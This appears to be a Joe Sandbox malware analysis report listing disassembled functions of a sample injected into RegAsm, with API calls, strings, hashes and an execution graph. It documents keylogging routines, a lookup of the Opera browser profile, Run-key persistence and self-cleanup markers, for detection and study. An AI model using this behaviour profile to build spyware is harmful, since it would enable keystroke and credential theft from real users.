                                                                                • Instruction Fuzzy Hash: F1F05E70A0021AE6CA04BBB69C478EF7B2C9910755B40017BBA01721D3FE7CA94586ED
                                                                                Function 0040C5C4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • PathFileExistsW.SHLWAPI(00000000), ref: 0040C5F7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ExistsFilePath
                                                                                • String ID: AppData$\Opera Software\Opera Stable\
                                                                                • API String ID: 1174141254-1629609700
                                                                                • Opcode ID: 8f8d25e03aac0077426d96557f64e84766c5e147873ceb62e84888fad8dfe89f
                                                                                • Instruction ID: 695210f55460e2722832162fecb8267ed9c5d90cd61684e29202a639a57ef244
                                                                                • Opcode Fuzzy Hash: 8f8d25e03aac0077426d96557f64e84766c5e147873ceb62e84888fad8dfe89f
                                                                                • Instruction Fuzzy Hash: 38F05E30A00219D6CA14BBB69C478EF7B2C9950755F1005BBBA01B21D3EE789941C6ED
                                                                                Function 00443885 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _free
                                                                                • String ID: xX4
                                                                                • API String ID: 269201875-4134912787
                                                                                • Opcode ID: c3cbfa58486471b9b0b5450975d814376b4bfcef5d9edc52bbd6be3dc13577df
                                                                                • Instruction ID: 5d396c1abc39b18bdc3e623667384c8b5cce6391ee106473ff554fc58991571d
                                                                                • Opcode Fuzzy Hash: c3cbfa58486471b9b0b5450975d814376b4bfcef5d9edc52bbd6be3dc13577df
                                                                                • Instruction Fuzzy Hash: 7CE0E532A0652041F675763B2D05A5B47C55FC2B3AF22033BF028861C1DFEC494A606E
                                                                                Function 0040B681 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32keyboardCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetKeyState.USER32(00000011), ref: 0040B686
                                                                                  • Part of subcall function 0040A41B: GetForegroundWindow.USER32 ref: 0040A451
                                                                                  • Part of subcall function 0040A41B: GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A45D
                                                                                  • Part of subcall function 0040A41B: GetKeyboardLayout.USER32 ref: 0040A464
                                                                                  • Part of subcall function 0040A41B: GetKeyState.USER32(00000010), ref: 0040A46E
                                                                                  • Part of subcall function 0040A41B: GetKeyboardState.USER32(?), ref: 0040A479
                                                                                  • Part of subcall function 0040A41B: ToUnicodeEx.USER32 ref: 0040A49C
                                                                                  • Part of subcall function 0040A41B: ToUnicodeEx.USER32 ref: 0040A4FC
                                                                                  • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,00000000,0040B245,00000000), ref: 0040A69D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                                                                • String ID: [AltL]$[AltR]
                                                                                • API String ID: 2738857842-2658077756
                                                                                • Opcode ID: f508c8d0c28e71ac455fa2a77041b079ca691cd00d60daeee8bf3b3b3c4de222
                                                                                • Instruction ID: d407634c764e35d79823ffb94670adf82ecea3c262ef0a09b09082b5b6a355d5
                                                                                • Opcode Fuzzy Hash: f508c8d0c28e71ac455fa2a77041b079ca691cd00d60daeee8bf3b3b3c4de222
                                                                                • Instruction Fuzzy Hash: B2E0652171032052C859363D592FABE2D11CB41B64B42097FF842AB7D6DABF4D5543CF
                                                                                Function 004161C5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 004161E3
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ExecuteShell
                                                                                • String ID: !D@$open
                                                                                • API String ID: 587946157-1586967515
                                                                                • Opcode ID: 4c61eaa6548ee28cdb1e2a4907ffc3a5f6acbad4bc53697dcaba2df13cd2f041
                                                                                • Instruction ID: 3b2857edeaddefe186f4a0a52e989bb70d7a4cfa1db765b6d796ce97600c5b03
                                                                                • Opcode Fuzzy Hash: 4c61eaa6548ee28cdb1e2a4907ffc3a5f6acbad4bc53697dcaba2df13cd2f041
                                                                                • Instruction Fuzzy Hash: 4AE012712483059AD214EA72DC92EFEB35CAB54755F404C3FF506524E2EF3C5C49C66A
                                                                                Function 0040B6DB Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24keyboardCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetKeyState.USER32(00000012), ref: 0040B6E0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: State
                                                                                • String ID: [CtrlL]$[CtrlR]
                                                                                • API String ID: 1649606143-2446555240
                                                                                • Opcode ID: 1ad9dfb3c513a634c020206c6c5afe09b5350a38294d89605c778c55c0391829
                                                                                • Instruction ID: b338140f060b4cc34328e336f8905ed3f99262ec5dadafe534bff25dd27afc5e
                                                                                • Opcode Fuzzy Hash: 1ad9dfb3c513a634c020206c6c5afe09b5350a38294d89605c778c55c0391829
                                                                                • Instruction Fuzzy Hash: CFE04F2160072052C5243A7D561A67A2911C7C2764F41057BE9826B7C6DABE891452DF
                                                                                Function 0043C218 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00449ADC: DeleteCriticalSection.KERNEL32(00471090,?,?,?,?,0046EB40,00000010,0043C225), ref: 00449B3E
                                                                                  • Part of subcall function 00449ADC: _free.LIBCMT ref: 00449B4C
                                                                                  • Part of subcall function 00449B7C: _free.LIBCMT ref: 00449B9E
                                                                                • DeleteCriticalSection.KERNEL32(0033E808), ref: 0043C241
                                                                                • _free.LIBCMT ref: 0043C255
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _free$CriticalDeleteSection
                                                                                • String ID: (3
                                                                                • API String ID: 1906768660-2570504824
                                                                                • Opcode ID: 63eb8731bacd2bc92b6a517d3705648d3868340f9125810a73be92756070acfe
                                                                                • Instruction ID: 53b3c8965ed62865b06495ab0c988fe80dbb580c75aaeb32feec7d00177b517a
                                                                                • Opcode Fuzzy Hash: 63eb8731bacd2bc92b6a517d3705648d3868340f9125810a73be92756070acfe
                                                                                • Instruction Fuzzy Hash: F8E04F328145208FEB71BB69FD4595A73E4EB4D325B12086FF80DA3165CAADAC809B4D
                                                                                Function 0040E7DA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                                                • __Init_thread_footer.LIBCMT ref: 00410F64
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Init_thread_footer__onexit
                                                                                • String ID: ,kG$0kG
                                                                                • API String ID: 1881088180-2015055088
                                                                                • Opcode ID: 9b05eae692bf82ff893255be440f7f21efe509fead0387458dc7709882e6db21
                                                                                • Instruction ID: 52a075922dd803dc3791164d579436726ad124eb3de8ddc986de269a183bf650
                                                                                • Opcode Fuzzy Hash: 9b05eae692bf82ff893255be440f7f21efe509fead0387458dc7709882e6db21
                                                                                • Instruction Fuzzy Hash: A8E0D8315149208EC514B729E542AC53395DB0E324B21907BF014D72D2CBAE78C28E5D
                                                                                Function 00413A5E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00413A6A
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: DeleteOpenValue
                                                                                • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                                                                • API String ID: 2654517830-1051519024
                                                                                • Opcode ID: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                                                                • Instruction ID: 8a242acd51d06e7ce72e997358fe7bb9804e2c240f13b939b69747d851efcbee
                                                                                • Opcode Fuzzy Hash: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                                                                • Instruction Fuzzy Hash: FFE0C231244208FBEF104FB1DD06FFA7B2CDB01F42F1006A9BA0692192C626CE049664
                                                                                Function 0040B8A4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 0040B8B1
                                                                                • RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 0040B8DC
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: DeleteDirectoryFileRemove
                                                                                • String ID: pth_unenc
                                                                                • API String ID: 3325800564-4028850238
                                                                                • Opcode ID: abbea0d7173f6b15884b0e8937d7cb34f61697f5a4d448918d1cd9e56a781f81
                                                                                • Instruction ID: ee660421d7ec44f6c6eaad5e9e1fc6482a22fb53094cf60c5c3e5a772ac54322
                                                                                • Opcode Fuzzy Hash: abbea0d7173f6b15884b0e8937d7cb34f61697f5a4d448918d1cd9e56a781f81
                                                                                • Instruction Fuzzy Hash: 5AE04F314006109BC610BB218854AD6335CAB04316F00497BE4A3A35A1DF38AC49D658
                                                                                Function 0041288B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13synchronizationCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                                                                • WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ObjectProcessSingleTerminateWait
                                                                                • String ID: pth_unenc
                                                                                • API String ID: 1872346434-4028850238
                                                                                • Opcode ID: a2eb2d9afd673111ff5afcc9fde18e5bb16fff8f446b795bb15600cc5347fa32
                                                                                • Instruction ID: 30425768eaae71e8f6d4d073063fb5581f05561c6d480f36d281b696a9d2b878
                                                                                • Opcode Fuzzy Hash: a2eb2d9afd673111ff5afcc9fde18e5bb16fff8f446b795bb15600cc5347fa32
                                                                                • Instruction Fuzzy Hash: DBD01234149312FFD7310F60EE4DB443B589705362F140361F439552F1C7A589D4AB58
                                                                                Function 0041BB77 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetLastInputInfo.USER32(NG), ref: 0041BB87
                                                                                • GetTickCount.KERNEL32(?,?,?,00415BDE), ref: 0041BB8D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CountInfoInputLastTick
                                                                                • String ID: NG
                                                                                • API String ID: 3478931382-1651712548
                                                                                • Opcode ID: 1072e3c2261f103fc32e137a75d3669dd2f4511b29ca1c5cc6daf9e0edaf2e7e
                                                                                • Instruction ID: 91b37e9d9b7f8f393223e5bf0be67cbbeb1ccf95644ad96dbec1e326022f3834
                                                                                • Opcode Fuzzy Hash: 1072e3c2261f103fc32e137a75d3669dd2f4511b29ca1c5cc6daf9e0edaf2e7e
                                                                                • Instruction Fuzzy Hash: 84D0C97180060CABDB04AFA5EC4D99DBBBCEB05212F1042A5E84992210DA71AA548A95
                                                                                Function 00440CE1 Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401D55), ref: 00440D77
                                                                                • GetLastError.KERNEL32 ref: 00440D85
                                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00440DE0
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ByteCharMultiWide$ErrorLast
                                                                                • String ID:
                                                                                • API String ID: 1717984340-0
                                                                                • Opcode ID: b039ec4469df985fcedc89be96e173b9c6b75658958c27081834ba59c0289411
                                                                                • Instruction ID: 51be13377619d21db21fabe69686c0ed70cae26876ac5a8e773c252addda8789
                                                                                • Opcode Fuzzy Hash: b039ec4469df985fcedc89be96e173b9c6b75658958c27081834ba59c0289411
                                                                                • Instruction Fuzzy Hash: 2D412670A00212AFEF218FA5C8447BBBBA4EF41310F2045AAFA59573E1DB399C31C759
                                                                                Function 00411B9A Relevance: 5.1, APIs: 4, Instructions: 119COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • IsBadReadPtr.KERNEL32(?,00000014,00000000,00000000,00000001,?,?,?,00411F2B), ref: 00411BC7
                                                                                • IsBadReadPtr.KERNEL32(?,00000014,00411F2B), ref: 00411C93
                                                                                • SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411CB5
                                                                                • SetLastError.KERNEL32(0000007E,00411F2B), ref: 00411CCC
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLastRead
                                                                                • String ID:
                                                                                • API String ID: 4100373531-0
                                                                                • Opcode ID: 90639ee29dfdd48ecb3f8d3d3319bc7730bab7022ac74643829df8c5f46e8e60
                                                                                • Instruction ID: 65e884089caabfe283b2879acbb60db065d5dd9ad58be7743d127bf22715a70c
                                                                                • Opcode Fuzzy Hash: 90639ee29dfdd48ecb3f8d3d3319bc7730bab7022ac74643829df8c5f46e8e60
                                                                                • Instruction Fuzzy Hash: 60419D716443059FEB248F19DC84BA7B3E4FF44714F00082EEA4A876A1F738E845CB99

                                                                                Execution Graph

                                                                                Execution Coverage:5.4%
                                                                                Dynamic/Decrypted Code Coverage:9.2%
                                                                                Signature Coverage:0%
                                                                                Total number of Nodes:1990
                                                                                Total number of Limit Nodes:56
                                                                                execution_graph 37716 4466f4 37735 446904 37716->37735 37718 446700 GetModuleHandleA 37721 446710 __set_app_type __p__fmode __p__commode 37718->37721 37720 4467a4 37722 4467ac __setusermatherr 37720->37722 37723 4467b8 37720->37723 37721->37720 37722->37723 37736 4468f0 _controlfp 37723->37736 37725 4467bd _initterm GetEnvironmentStringsW _initterm 37726 44681e GetStartupInfoW 37725->37726 37727 446810 37725->37727 37729 446866 GetModuleHandleA 37726->37729 37737 41276d 37729->37737 37733 446896 exit 37734 44689d _cexit 37733->37734 37734->37727 37735->37718 37736->37725 37738 41277d 37737->37738 37780 4044a4 LoadLibraryW 37738->37780 37740 412785 37741 412789 37740->37741 37786 414b81 37740->37786 37741->37733 37741->37734 37744 4127c8 37790 412465 memset ??2@YAPAXI 37744->37790 37746 4127ea 37802 40ac21 37746->37802 37751 412813 37820 40dd07 memset 37751->37820 37752 412827 37825 40db69 memset 37752->37825 37755 412822 37847 4125b6 ??3@YAXPAX DeleteObject 37755->37847 37757 40ada2 _wcsicmp 37758 41283d 37757->37758 37758->37755 37761 412863 CoInitialize 37758->37761 37830 41268e 37758->37830 37760 412966 37848 40b1ab ??3@YAXPAX ??3@YAXPAX 37760->37848 37846 4123e2 GetModuleHandleW RegisterClassW GetModuleHandleW CreateWindowExW 37761->37846 37765 41296f 37849 40b633 37765->37849 37767 412873 ShowWindow UpdateWindow GetModuleHandleW LoadAcceleratorsW GetMessageW 37772 412957 CoUninitialize 37767->37772 37777 4128ca 37767->37777 37772->37755 37773 4128d0 TranslateAcceleratorW 37774 412941 GetMessageW 37773->37774 37773->37777 37774->37772 37774->37773 37775 412909 IsDialogMessageW 37775->37774 37775->37777 37776 4128fd IsDialogMessageW 37776->37774 37776->37775 37777->37773 37777->37775 37777->37776 37778 41292b TranslateMessage DispatchMessageW 37777->37778 37779 41291f IsDialogMessageW 37777->37779 37778->37774 37779->37774 37779->37778 37781 4044f3 37780->37781 37785 4044cf FreeLibrary 37780->37785 37783 404507 MessageBoxW 37781->37783 37784 40451e 37781->37784 37783->37740 37784->37740 37785->37781 37787 414b8a 37786->37787 37788 412794 SetErrorMode GetModuleHandleW EnumResourceTypesW 37786->37788 37853 40a804 memset 37787->37853 37788->37744 37791 4124e0 37790->37791 37792 412505 ??2@YAPAXI 37791->37792 37793 41251c 37792->37793 37798 412521 37792->37798 37875 40e820 memset ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 37793->37875 37864 444722 37798->37864 37801 41259b wcscpy 37801->37746 37880 40b1ab ??3@YAXPAX ??3@YAXPAX 37802->37880 37806 40ad4b 37815 40ad76 37806->37815 37904 40a9ce 37806->37904 37807 40a9ce malloc memcpy ??3@YAXPAX ??3@YAXPAX 37808 40ac5c 37807->37808 37808->37806 37808->37807 37810 40ace7 ??3@YAXPAX 37808->37810 37808->37815 37884 40a8d0 37808->37884 37896 4099f4 37808->37896 37810->37808 37814 40a8d0 7 API calls 37814->37815 37881 40aa04 37815->37881 37816 40ada2 37817 40adaa 37816->37817 37818 40adc9 37816->37818 37817->37818 37819 40adb3 _wcsicmp 37817->37819 37818->37751 37818->37752 37819->37817 37819->37818 37909 40dce0 37820->37909 37822 40dd3a GetModuleHandleW 37914 40dba7 37822->37914 37826 40dce0 3 API calls 37825->37826 37827 40db99 37826->37827 37986 40dae1 37827->37986 38000 402f3a 37830->38000 37832 412766 37832->37755 37832->37761 37833 4126d3 _wcsicmp 37834 4126a8 37833->37834 37834->37832 37834->37833 37836 41270a 37834->37836 38034 4125f8 7 API calls 37834->38034 37836->37832 38003 411ac5 37836->38003 37846->37767 37847->37760 37848->37765 37850 40b640 37849->37850 37851 40b639 ??3@YAXPAX 37849->37851 37852 40b1ab ??3@YAXPAX ??3@YAXPAX 37850->37852 37851->37850 37852->37741 37854 40a83b GetSystemDirectoryW 37853->37854 37855 40a84c wcscpy 37853->37855 37854->37855 37860 409719 wcslen 37855->37860 37858 40a881 LoadLibraryW 37859 40a886 37858->37859 37859->37788 37861 409724 37860->37861 37862 409739 wcscat LoadLibraryW 37860->37862 37861->37862 37863 40972c wcscat 37861->37863 37862->37858 37862->37859 37863->37862 37865 444732 37864->37865 37866 444728 DeleteObject 37864->37866 37876 409cc3 37865->37876 37866->37865 37868 412551 37869 4010f9 37868->37869 37870 401130 37869->37870 37871 401134 GetModuleHandleW LoadIconW 37870->37871 37872 401107 wcsncat 37870->37872 37873 40a7be 37871->37873 37872->37870 37874 40a7d2 37873->37874 37874->37801 37874->37874 37875->37798 37879 409bfd memset wcscpy 37876->37879 37878 409cdb CreateFontIndirectW 37878->37868 37879->37878 37880->37808 37882 40aa14 37881->37882 37883 40aa0a ??3@YAXPAX 37881->37883 37882->37816 37883->37882 37885 40a8eb 37884->37885 37886 40a8df wcslen 37884->37886 37887 40a906 ??3@YAXPAX 37885->37887 37888 40a90f 37885->37888 37886->37885 37892 40a919 37887->37892 37889 4099f4 3 API calls 37888->37889 37889->37892 37890 40a932 37894 4099f4 3 API calls 37890->37894 37891 40a929 ??3@YAXPAX 37893 40a93e memcpy 37891->37893 37892->37890 37892->37891 37893->37808 37895 40a93d 37894->37895 37895->37893 37897 409a41 37896->37897 37898 4099fb malloc 37896->37898 37897->37808 37900 409a37 37898->37900 37901 409a1c 37898->37901 37900->37808 37902 409a30 ??3@YAXPAX 37901->37902 37903 409a20 memcpy 37901->37903 37902->37900 37903->37902 37905 40a9e7 37904->37905 37906 40a9dc ??3@YAXPAX 37904->37906 37908 4099f4 3 API calls 37905->37908 37907 40a9f2 37906->37907 37907->37814 37908->37907 37933 409bca GetModuleFileNameW 37909->37933 37911 40dce6 wcsrchr 37912 40dcf5 37911->37912 37913 40dcf9 wcscat 37911->37913 37912->37913 37913->37822 37934 44db70 37914->37934 37918 40dbfd 37937 4447d9 37918->37937 37921 40dc34 wcscpy wcscpy 37963 40d6f5 37921->37963 37922 40dc1f wcscpy 37922->37921 37925 40d6f5 3 API calls 37926 40dc73 37925->37926 37927 40d6f5 3 API calls 37926->37927 37928 40dc89 37927->37928 37929 40d6f5 3 API calls 37928->37929 37930 40dc9c EnumResourceNamesW EnumResourceNamesW wcscpy 37929->37930 37969 40da80 37930->37969 37933->37911 37935 40dbb4 memset memset 37934->37935 37936 409bca GetModuleFileNameW 37935->37936 37936->37918 37939 4447f4 37937->37939 37938 40dc1b 37938->37921 37938->37922 37939->37938 37940 444807 ??2@YAPAXI 37939->37940 37941 44481f 37940->37941 37942 444873 _snwprintf 37941->37942 37943 4448ab wcscpy 37941->37943 37976 44474a 8 API calls 37942->37976 37945 4448bb 37943->37945 37977 44474a 8 API calls 37945->37977 37946 4448a7 37946->37943 37946->37945 37948 4448cd 37978 44474a 8 API calls 37948->37978 37950 4448e2 37979 44474a 8 API calls 37950->37979 37952 4448f7 37980 44474a 8 API calls 37952->37980 37954 44490c 37981 44474a 8 API calls 37954->37981 37956 444921 37982 44474a 8 API calls 37956->37982 37958 444936 37983 44474a 8 API calls 37958->37983 37960 44494b 37984 44474a 8 API calls 37960->37984 37962 444960 ??3@YAXPAX 37962->37938 37964 44db70 37963->37964 37965 40d702 memset GetPrivateProfileStringW 37964->37965 37966 40d752 37965->37966 37967 40d75c WritePrivateProfileStringW 37965->37967 37966->37967 37968 40d758 37966->37968 37967->37968 37968->37925 37970 44db70 37969->37970 37971 40da8d memset 37970->37971 37972 40daac LoadStringW 37971->37972 37973 40dac6 37972->37973 37973->37972 37975 40dade 37973->37975 37985 40d76e memset GetPrivateProfileStringW WritePrivateProfileStringW memset _itow 37973->37985 37975->37755 37976->37946 37977->37948 37978->37950 37979->37952 37980->37954 37981->37956 37982->37958 37983->37960 37984->37962 37985->37973 37996 409b98 GetFileAttributesW 37986->37996 37988 40daea 37989 40db63 37988->37989 37990 40daef wcscpy wcscpy GetPrivateProfileIntW 37988->37990 37989->37757 37997 40d65d GetPrivateProfileStringW 37990->37997 37992 40db3e 37998 40d65d GetPrivateProfileStringW 37992->37998 37994 40db4f 37999 40d65d GetPrivateProfileStringW 37994->37999 37996->37988 37997->37992 37998->37994 37999->37989 38035 40eaff 38000->38035 38004 411ae2 memset 38003->38004 38005 411b8f 38003->38005 38076 409bca GetModuleFileNameW 38004->38076 38017 411a8b 38005->38017 38007 411b0a wcsrchr 38008 411b22 wcscat 38007->38008 38009 411b1f 38007->38009 38077 414770 wcscpy wcscpy wcscpy CloseHandle 38008->38077 38009->38008 38011 411b67 38078 402afb 38011->38078 38015 411b7f 38134 40ea13 SendMessageW memset SendMessageW 38015->38134 38018 402afb 27 API calls 38017->38018 38019 411ac0 38018->38019 38020 4110dc 38019->38020 38021 41113e 38020->38021 38026 4110f0 38020->38026 38159 40969c LoadCursorW SetCursor 38021->38159 38023 411143 38160 4032b4 38023->38160 38178 444a54 38023->38178 38024 4110f7 _wcsicmp 38024->38026 38025 411157 38027 40ada2 _wcsicmp 38025->38027 38026->38021 38026->38024 38181 410c46 10 API calls 38026->38181 38030 411167 38027->38030 38028 4111af 38030->38028 38031 4111a6 qsort 38030->38031 38031->38028 38034->37834 38036 40eb10 38035->38036 38049 40e8e0 38036->38049 38039 40eb6c memcpy memcpy 38040 40ebe1 38039->38040 38041 40ebb7 38039->38041 38040->38039 38042 40ebf2 ??2@YAPAXI ??2@YAPAXI 38040->38042 